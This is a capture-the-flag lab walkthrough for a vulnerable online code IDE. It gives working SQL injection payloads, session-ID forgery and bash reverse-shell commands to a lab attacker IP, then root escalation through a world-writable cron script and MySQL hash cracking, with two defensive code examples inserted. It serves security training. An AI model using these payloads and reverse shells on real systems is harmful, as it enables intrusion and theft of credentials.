Walkthrough 2160

Name WebApp Security CTF: [Dec 11-15]

URL https://attackdefense.com/challengedetails?cid=2160

Type CTF Weekly: All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

When the lab is launched, an Online Code IDE WebApp opens up in Firefox.

Step 1: Configure BurpSuite to intercept all the requests.

Launch BurpSuite:

Select Web Application Analysis > burpsuite from the application menu.
Once BurpSuite opens up, configure FoxyProxy to use the Burp Suite profile:

Step 2: Log in to the webapp using SQLi.

Use the following credentials to perform SQLi and log in to the webapp:

Email: ' or '1'='1'#@test.com

Password: 123

Click on the login button and forward the intercepted requests:

Forward the above request.

Intercept the response to the above request:

Now, forward the above request and notice the intercepted response:

FLAG1: 2fb96bbc46ca18d07e0455acc706ea17

Notice that the response contains a SESSID (Session ID) parameter.

Session ID (sessid):
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9

It looks like the SESSID is base64-encoded.

Note: Do not forward the above response. It will be used in the next steps.

Step 3: Decoding the session ID.

Command: echo eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d

FLAG2: fc235edfe919b80b4e87a7ef852f1f4f

The decoded session ID contains a flag.

Step 4: Forging the Session ID.

Notice that there is an admin attribute in the decoded session and it is set to 0.

Setting it to 1 and creating the forged Session ID:

Command: echo '{"admin": 1, "userid": 1, "email": "jackie@code-ide.com", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Forged Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==

Modify the Session ID (sessid) in the intercepted response and forward it:

Notice that the webpage shows the logged-in screen (the SQLi was successful!) and there is a flag in there as well (since the admin attribute in the Session ID was set to 1).

FLAG4: 7fa644c02146cd735a772199f6c9b050

Step 5: Run some code in the IDE.

Python Code:

print("Hello World!")

The response indicates that the Session ID is invalid!

It must be because the Session ID was tampered with in the previous step (while setting the admin attribute to 1).

Step 6: Log out of the webapp and log back in using the same SQLi payload.

Click on the Logout button located on the top right of the webapp:

Log back in using the same SQLi payload as used before:

Username: ' or '1'='1'#@test.com

Password: 123

Step 7: Run some code in the IDE.

Python Code:

print("Hello World!")

Execute the above code.

Forward the above request.

Notice the Session ID in the above request:

Session ID:
eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9

Step 8: Modify the admin attribute in the Session ID.

Decode the Session ID retrieved from the above request, set the admin attribute to true (anything other than 0 is considered true) and encode it back:

Commands:
echo eyJhZG1pbiI6IDAsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9 | base64 -d

echo '{"admin": 1, "userid": 1, "email": "jackie@code-ide.com", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiamFja2llQGNvZGUtaWRlLmNvbSIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==

Send the above request to repeater:


Modify the sessid in the request and place the one we created above (having admin attribute set
to 1):

Send the above request.


The response indicates that the Session ID was incorrect!

Step 9: Creating a forged Session ID with the admin attribute set.

Since the backend is vulnerable to SQLi, try a union-based SQLi payload in the email attribute so that the backend itself sets the admin attribute (to anything other than 0):

Commands:
echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}'

echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDMgIyIsICJGTEFHMiI6ICJmYzIzNWVkZmU5MTliODBiNGU4N2E3ZWY4NTJmMWY0ZiJ9Cg==

Modify the Session ID in the request in the repeater:

The above Session ID didn't work! It must be because the number of columns selected on the right side of the union keyword does not match the number of columns returned by the query on the left side.

Modify the union-based SQLi payload and increase the number of columns on the right side of the union keyword:

Command: echo '{"admin": 1, "userid": 1, "email": "'"' union select 1,2,3,4" '#", "FLAG2": "fc235edfe919b80b4e87a7ef852f1f4f"}' | base64 -w0

Modified Session ID:
eyJhZG1pbiI6IDEsICJ1c2VyaWQiOiAxLCAiZW1haWwiOiAiJyB1bmlvbiBzZWxlY3QgMSwyLDMsNCAjIiwgIkZMQUcyIjogImZjMjM1ZWRmZTkxOWI4MGI0ZTg3YTdlZjg1MmYxZjRmIn0K

Modify the Session ID in the request in the repeater:

This time, it worked! The Session ID was forged correctly!

There is a flag in the response headers:

FLAG3: 9448a9de8df7ef9473c3d82729bff89b

Note: Turn off the Intercept Mode in BurpSuite for all the future requests.

Notice the response in the webapp as well (after the interception is turned off in BurpSuite).
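The session handling exploited in Steps 4, 8 and 9 rests on a session ID that is plain base64 of JSON, so every field in it, admin and email alike, is client-controlled. The following Python is an added example (not the lab's or the walkthrough's code) that puts that unsigned scheme beside an HMAC-signed one; SERVER_SECRET is a constructed value and CLAIMS is the walkthrough's decoded session minus FLAG2.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret for the demo; a real service loads it from configuration, never from source.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"
# Claims from the walkthrough's decoded session (FLAG2 omitted).
CLAIMS = {"admin": 0, "userid": 1, "email": "jackie@code-ide.com"}


def unsigned_session(claims: dict) -> str:
    """The lab's scheme: base64(JSON). Nothing binds the claims to the server."""
    return base64.b64encode(json.dumps(claims).encode()).decode()


def parse_unsigned_session(token: str) -> dict:
    # The server trusts whatever comes back, so admin and email are client-controlled.
    return json.loads(base64.b64decode(token))


def _encode_body(claims: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()


def _tag(body: str) -> str:
    return hmac.new(SERVER_SECRET, body.encode(), hashlib.sha256).hexdigest()


def signed_session(claims: dict) -> str:
    """Hardened form: the body plus an HMAC-SHA256 tag that only the server can compute."""
    body = _encode_body(claims)
    return f"{body}.{_tag(body)}"


def parse_signed_session(token: str):
    """Returns the claims, or None when the tag does not match the body (tampered or forged)."""
    body, _, tag = token.rpartition(".")
    if not hmac.compare_digest(tag, _tag(body)):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def forge_without_secret(token: str, claims: dict) -> str:
    """All a client can do to a signed token: swap the body and keep the old tag."""
    return f"{_encode_body(claims)}.{token.rpartition('.')[2]}"


def demo() -> tuple:
    """(admin value the unsigned server accepts, what the signed server returns for a forgery)."""
    forged_unsigned = unsigned_session({**CLAIMS, "admin": 1})
    accepted_admin = parse_unsigned_session(forged_unsigned)["admin"]
    forged_signed = forge_without_secret(signed_session(CLAIMS), {**CLAIMS, "admin": 1})
    return accepted_admin, parse_signed_session(forged_signed)
```

Signing stops a client from smuggling the ' union select payload in through the session's email field, but the backend query that reads email must still be parameterized; the signature only guarantees that the server issued those claims.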

Step 10: Executing system commands on the target machine.

Python Code:

import os

os.system("ls -al")

The above code uses the system function from the os module to run the command "ls -al".

Step 11: Obtaining a shell session on the target machine.

Check the IP address of the host machine (the Kali attacker machine) and start a netcat listener:

Command: nc -lvp 54321

Now, paste the following code in the Code IDE:

Code:

import os

os.system("bash -c 'bash -i >& /dev/tcp/192.183.31.2/54321 0>&1'")

Note: Make sure to replace the IP address with the one you get in your lab instance.

Run the code and notice the terminal running the netcat listener:

A shell session is received back!

Step 12: Looking for the flags on the target machine.

Finding all the flag files:

Command: find / -name 'FLAG*' 2>/dev/null

FLAG6: c6d0b7e9cfd203a6db53a75f5f952b9c

Check the environment variables:

Command: printenv

FLAG5: 4787bf9ab0f4b5f60a19b577e4d1a486

Check the processes:

Command: ps aux

Notice that the cron service is running!

Step 13: Checking the cron jobs.

Command: cat /etc/crontab

Notice that the last entry (/cleanup.sh) looks interesting. It is run as root and gets executed every minute!

Checking the contents of the cleanup script:

Command: cat /cleanup.sh

Notice that there is a flag in this script:

FLAG8: a6dd00deb2654213060bc0efc28e576e

This script cleans up files that are older than 1 minute and owned by the codebot user (excluding the home directory files).

Checking the permissions of the cleanup script:

Command: ls -al /cleanup.sh

It is world-writable! Since root runs it every minute, anyone who can write to it gets their commands run as root, which can be leveraged to gain a root shell on the target machine.
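The /etc/crontab finding in Step 13 generalizes to a check a defender can run on a host: any root job whose command references a world-writable path. The following Python is an added example, not part of the walkthrough or the lab; it builds a constructed crontab and two scripts in a temp directory (the script names and the SHELL line are constructed) and reports only the root job that points at a mode-777 script.

```python
import os
import stat
import tempfile


def parse_system_crontab(text: str) -> list:
    """(user, command) pairs from /etc/crontab-style text: m h dom mon dow user command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first:                 # environment assignment such as SHELL=/bin/sh
            continue
        shorthand = first.startswith("@")  # @reboot / @hourly form: spec user command
        fields = line.split(None, 2) if shorthand else line.split(None, 6)
        if len(fields) == (3 if shorthand else 7):
            jobs.append((fields[-2], fields[-1]))
    return jobs


def world_writable(path: str) -> bool:
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def audit(text: str) -> list:
    """Absolute paths in root-run jobs that any local user can modify (the /cleanup.sh condition)."""
    findings = []
    for user, command in parse_system_crontab(text):
        for token in command.split():
            if user == "root" and token.startswith("/") and world_writable(token):
                findings.append(token)
    return findings


def demo() -> list:
    """Constructed crontab and scripts in a temp dir; one root job mirrors the lab's /cleanup.sh."""
    d = tempfile.mkdtemp()
    loose, strict = os.path.join(d, "cleanup.sh"), os.path.join(d, "backup.sh")
    for path, mode in ((loose, 0o777), (strict, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(path, mode)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"0 3 * * * root {strict}\n"          # root, but only root can write it
        f"* * * * * codebot bash {loose}\n"   # world-writable, but not run as root
        f"* * * * * root bash {loose}\n"      # root runs a file anyone can edit
    )
    return audit(crontab)
```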

Step 14: Retrieving the root shell.

Modify the contents of the cleanup script to receive a shell session on the attacker machine:

Commands:
echo "bash -c 'bash -i >& /dev/tcp/192.183.31.2/8888 0>&1'" > /cleanup.sh
cat /cleanup.sh

On the attacker machine, start a netcat listener:

Command: nc -lvp 8888

Wait for a while; within 1 minute (the next cron run), the root shell session is received on the listener:

Confirming that it is the root shell:

Command: whoami

The root shell session has been retrieved!

Step 15: Looking for the flags on the target machine.

Command: find / -name 'FLAG*' 2>/dev/null

One of the flags (FLAG6) has already been retrieved. Retrieving the other 2 flags:

Commands:
cat /home/admin/FLAG7
cat /root/FLAG10

FLAG7: 59b0dc3b11be41bd31e3e20823bc3a45
FLAG10: e8288b0cc0a442b58260b96f72609c9d

Checking the process listing:

Command: ps aux

Notice that a MySQL server is running on the target machine, as seen in the above output.

Note: To upgrade to a fully interactive shell, use the following commands:

Commands:
python -c "import pty;pty.spawn('/bin/bash')"
[Press CTRL + Z]
stty raw -echo
fg

Now, the shell session should be fully interactive!

Step 16: Look for MySQL credentials in the backend API code.

Commands:
ls
ls pythonAPI/
grep -r -C4 mysql pythonAPI/

Notice that the code (DBAPI.py) contains the credentials used to connect to the MySQL server:

Username: michael
Password: 5up3r_53cur3_p4ssw0rd

Step 17: Connecting to the MySQL server using the credentials retrieved in the previous step.

Command: mysql -umichael -p5up3r_53cur3_p4ssw0rd

Note: If the shell session was not upgraded, Python could be used to connect to the MySQL server:

Step 18: Retrieving the flag from the database.

Commands:
show databases;
use secret_flag_9686d1f73c3;
show tables;
select * from flag;

FLAG9: 1f63300548823105d976aeb86a2ccdfe

Step 19: Retrieving the authentication string for the MySQL root user.

Use the following SQL query to get the username, host and authentication string of all the users in the mysql.user table:

SQL Query: select user,host,authentication_string from mysql.user;

authentication_string for the MySQL root user:
*6B5EDDE567F4F29018862811195DBD14B8ADDD2A

Step 20: Cracking the authentication_string for the MySQL root user.

Save the authentication_string for the root user to a file (on the attacker machine, that is, the Kali GUI) and crack it using John the Ripper:

Commands:
echo '*6B5EDDE567F4F29018862811195DBD14B8ADDD2A' > hash.txt
john hash.txt

FLAG11 (Password of MySQL root user): 1234567890
